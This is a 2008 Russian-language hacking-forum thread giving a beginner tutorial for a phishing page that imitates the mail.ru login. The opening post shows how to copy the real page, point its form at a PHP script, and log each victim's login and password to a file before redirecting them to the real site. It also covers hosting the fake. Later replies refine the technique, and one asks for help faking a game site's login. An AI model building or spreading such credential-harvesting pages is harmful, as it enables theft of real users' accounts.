Делаем фейк на mail.ru

Discussion in 'PHP' started by _GlaD1aT(OR)_, 2 Aug 2008.

Thread Status:
Not open for further replies.
  1. _GlaD1aT(OR)_

    _GlaD1aT(OR)_ Elder - Старейшина

    Joined:
    24 Jul 2008
    Messages:
    38
    Likes Received:
    15
    Reputations:
    0
    Делаем фейк на mail.ru
    Посмотрел несколько тем про фейки на разные сайты и увидел что их продают за 50, 70 рублей и очюмел. Вот и решел написать мини-статью о содании фейках. Буду обьяснять для тех, кто в PHP и HTML не разбирается. И так, для примера нашего фейка возьму одну из самый популярных почтовую систему http://mail.ru, нам надо сделать поддельную страницу авторизации...Я буду работать через свой любимый браузер Mozilla ForeFox, ну что, как говориться - поехалииии!!! Сначала скопируем в браузер ссылку http://win.mail.ru/cgi-bin/login, если все сделали правильно, то перед вами должна открыться страница авторизации на mail.ru. Далее жмем вид - исходный текст страницы (Ctrl+U). Перед вами открылась страница с непонятными буквами и цифрами, если это так, то вы делаете все правильно...теперь надо нажать правка - выделить все (Ctrl+A), потом опять нажимаем правка, и так копировать (Ctrl+C), Теперь открываем блокнот, и там нажимаем вставить (Ctrl+V). Так, давайте продолжим создание. Теперь основная часть фейка, надо изменить в тексте несколько скрочек, так как текс большой, и искать их будет очень долго, то для этого будем использовать поиск по тексту, нажав Ctrl+F. Сразу напишу, кто с текстом работает плохо, то пусть использует комбинацию Ctrl+H (замена текста), а я предпочитаю так и многие пользователи обычным выделением/копипоранием/вставлением, еле написал. Нажимаем Ctrl+F и ищем следующий текст:
    Code:
    <form method="post" action="auth" onSubmit="return CheckForm(this);">
    этот текст надо поменять на вот этот код:
    Code:
    <form method="post" action="mail.php" onSubmit="return CheckForm(this);">.
    Этим мы с помощью будующей страницы будем сохранять данные. Так, чють не забыл, находим есче вот эту строки
    Code:
    <input type="hidden" name="page" value="">
    <input type="hidden" name="post" value="">
    <input type="hidden" name="login_from" value="">
    их надо удалить. И теперь нажимаем Файл - Сохранить как (Ctrl+Shift+S) и сохраняем файл с именем index.php. Фуф, основную страницу фейка мы сделали. Теперь надо создать страницу, с помощью которой, данные которые вводит жертва, сохранились нам на хост. Опять открываем блокнот и копируем куда вот этот тект:
    Code:
    <?PHP
    $Login = $_POST['Login'];Логин от E-mail'a
    $Domain = $_POST['Domain'];//Домен (mail, inbox, list, bk)
    $Pass = $_POST['Password'];//Пароль от E-mail'a
    $c = "$Login@$Domain:$Pass";
    $fp = fopen("file","a+"); //открыть файл
    fwrite($fp,"\n $c <br> \n");//записываем вс` данные
    fclose($fp); //закрываем
    header("Location: http://win.mail.ru/cgi-bin/login"); //куда перенавравиться пользователь после ввода данных
    echo "<META HTTP-EQUIV=\"Refresh\" content =\"0; URL=http://win.mail.ru/cgi-bin/start?1390370218\">"
    ?>
    И сохраняем этот файл как mail.php нажав Ctrl+Shift+S.
    Теперь надо опять-же открыть блокнот, и нажать сохранить как с именем file. Писать там ничего не надо. Все фейк готов, осталось только залить все (3-файла) на хостинг. Я буду приводить пример на бесплатном хостинге http://ho.com.ua. Регистрируем аккуант, думаю проблем не возникнет, за тем заходим в панель управления хостингом, нажимаем на кнопку на которой написано "Управление файлами" и откроется новое окно - Файловый менеджер (У кого есть FTP, то используйте его, я пользуюсь FileZilla FTP Client). Заходим в папку htdocs и удаляем от туда все файлы, потом закачайте все файлы котороые мы только что создали! И наконец последнее что вам осталось сделать это поставить режим доступа на все файлы 754, кроме файла file.txt, на него поставить права 777, его оставляем как есть. Ну и все, фейк готов. Как впарить фейк жертве, это соверщенно другая тема. Учите СИ и вперед. Удачи, все вопросы писать тут. И кстати, таким способом можно написать фейк с любого сайта.

    Copyright ©2008
     
    #1 _GlaD1aT(OR)_, 2 Aug 2008
    Last edited: 2 Aug 2008
    4 people like this.
  2. MafiaBoy3

    MafiaBoy3 Banned

    Joined:
    14 Apr 2007
    Messages:
    295
    Likes Received:
    15
    Reputations:
    1
    Хоть статья и неважная, но застарания +

    ps:Лучше бы ты сделал фейк paypal.com. Посмотрим что бы у тебя вышло?
     
  3. 5triker

    5triker Elder - Старейшина

    Joined:
    5 Apr 2007
    Messages:
    62
    Likes Received:
    41
    Reputations:
    1
    +1 , какая то херня

    ps : есть теги
    Code:
     [php] и тп , ацкий красный шрифт ебет глаза
     
  4. P3L3NG

    P3L3NG Banned

    Joined:
    4 Jun 2008
    Messages:
    175
    Likes Received:
    204
    Reputations:
    11
    кому надо научатся сами. а вот так по шаблону делать не понимая сути это сакс((
     
  5. 5triker

    5triker Elder - Старейшина

    Joined:
    5 Apr 2007
    Messages:
    62
    Likes Received:
    41
    Reputations:
    1
    да и кстати если ссылки на css . картинки и тп локальные то по вышеуказанной статье на выходе у нас будет херня а не фейк
     
    1 person likes this.
  6. _GlaD1aT(OR)_

    _GlaD1aT(OR)_ Elder - Старейшина

    Joined:
    24 Jul 2008
    Messages:
    38
    Likes Received:
    15
    Reputations:
    0
    Поставил СОDE, на популярных сайтах css редкость, во всяком случаи по популярных почтовых системах
     
  7. 5triker

    5triker Elder - Старейшина

    Joined:
    5 Apr 2007
    Messages:
    62
    Likes Received:
    41
    Reputations:
    1
    типа пошутил ?
     
  8. 5triker

    5triker Elder - Старейшина

    Joined:
    5 Apr 2007
    Messages:
    62
    Likes Received:
    41
    Reputations:
    1
    на том же майл ру
    Code:
    <link href="http://img.mail.ru/mail/ru/css/mail-splash3.css?0" rel="stylesheet" type="text/css" />
    по твоему что это ? там правда полный путь и в фейке не поменяет ничего

    а вот допусти ВК
    Code:
    <link rel="stylesheet" href="css/rustyle.css" type="text/css" />
    локальная ссылка и если не поменять в фейке будет хренотень
     
    #8 5triker, 2 Aug 2008
    Last edited: 2 Aug 2008
  9. >.:!FrE!:.<

    >.:!FrE!:.< Elder - Старейшина

    Joined:
    19 Jul 2008
    Messages:
    0
    Likes Received:
    28
    Reputations:
    0
    Эта статья вроде с хакера стянута;)
     
    2 people like this.
  10. MVadim

    MVadim Elder - Старейшина

    Joined:
    6 Oct 2007
    Messages:
    397
    Likes Received:
    164
    Reputations:
    9
    видел по фейкам статьи намного лучше видел и видео по фейкам в котором объясняли что зачем и почему
     
  11. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    гы... чел имел ввиду XSS )))))
     
  12. Nurik

    Nurik Elder - Старейшина

    Joined:
    28 Aug 2008
    Messages:
    79
    Likes Received:
    102
    Reputations:
    1
    поделись ссылками раз видел)))
     
  13. idp001

    idp001 New Member

    Joined:
    25 Sep 2009
    Messages:
    2
    Likes Received:
    1
    Reputations:
    1
    ну такое же чудо можно сотворить не только с авторизацией, а еще и с таким приколом типа "вам пришло секретное письмо". только это уже езженые переезженые способы...
     
    1 person likes this.
  14. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    http://forum.antichat.ru/showpost.php?p=1336830&postcount=3
     
  15. vlad_tsepesh

    vlad_tsepesh Member

    Joined:
    19 Feb 2009
    Messages:
    63
    Likes Received:
    15
    Reputations:
    0
    Тут не состыковка какая то происходит во всяком случае мне так кажется... хотя я могу очень глубоко ошибаться так,что не судите строго....по поводу вот этого скрипта в описание темы.....тут описывается вот такая часть скрипта,а точнее вот начало скрипта который первоначальный.... <form method="post" action="auth" onSubmit="return CheckForm(this);"> как описывает автор нужно заменить на
    <form method="post" action="mail.php" onSubmit="return CheckForm(this);">. а на самом деле в первоначальном исходнике до изменения тут очевидно видно,что там совсем form method="post" action="http://win.mail.ru/cgi-bin/auth" name="Auth" onSubmit="return CheckForm(this);">

    Или если заменить на этот скрипт даже если первоначальный он даже не такой,то значения не имеет??????...люди обьясните если я рассуждаю не так...поправьте меня пожалуйста.

    ИЗВЕНИТЕ ЕСЛИ Я НЕСУ КАКОЙ-ТО БРЕД!!!
     
    #15 vlad_tsepesh, 20 Jan 2010
    Last edited: 20 Jan 2010
  16. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    vlad_tsepesh
    Не имеет, неважно что там написано в поле Экшен, главное заменить на локальный обработчик формы и сохранить данные.

    Файл - Сохранить Как - HTML файл с изображениями. И получим все скрипты JS, картинки.
     
  17. vlad_tsepesh

    vlad_tsepesh Member

    Joined:
    19 Feb 2009
    Messages:
    63
    Likes Received:
    15
    Reputations:
    0
    А сама система палит его как в контакте??? например?!,а то может и зря придется с ним возиться :confused:
     
  18. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    Ты имееш ввиду Это? :
    В фейке это можно вырезать, это расчитано для Ифреймов как я понял, хотя невникал, видел на парочке сайтов.
     
  19. vlad_tsepesh

    vlad_tsepesh Member

    Joined:
    19 Feb 2009
    Messages:
    63
    Likes Received:
    15
    Reputations:
    0
    Почти...но немного в том смысле,что когда переходишь на фейковую страницу которая якобы авторизации контакта,а он выдает такое...в смысле контакт:

    Вот такое примерно...вот я и подумал,а вдруг не стоит заморачиваться?! ...вдруг так же и там???:confused: :confused: :confused:
     
  20. Daioh

    Daioh New Member

    Joined:
    18 Sep 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    С mail.ru вроде все понятно и не так сложно, но мне нужен фейк на https://www.raggame.ru/login.asp, пытался отталкиваячь от данной статьи написать, что естественно не увенчалось успехом, для начала исходный код страницы копируется без оформления, и выглядит ужасно в браузере, функцию описанную в 17 посте, не нашел ни в одном из имеющихся у меня текстовых редакторов, дальше больше, какая строка "моего" кода отвечает за подобную операцию ? ( <form method="post" action="mail.php" onSubmit="return CheckForm(this);">. ) Я так понял что эта (thisForm.login_action.value=1;
    thisForm.submit(); ) хотя я уверен на 80% что это не так, потом код отвечающих за сохранение данных, у меня будет такой же или другой. Помогите пожалуйста новичку, решил изучать html начиная сразу с практики
     
Loading...
Similar Threads - Делаем фейк mail
  1. GAiN
    Replies:
    3
    Views:
    7,462
Thread Status:
Not open for further replies.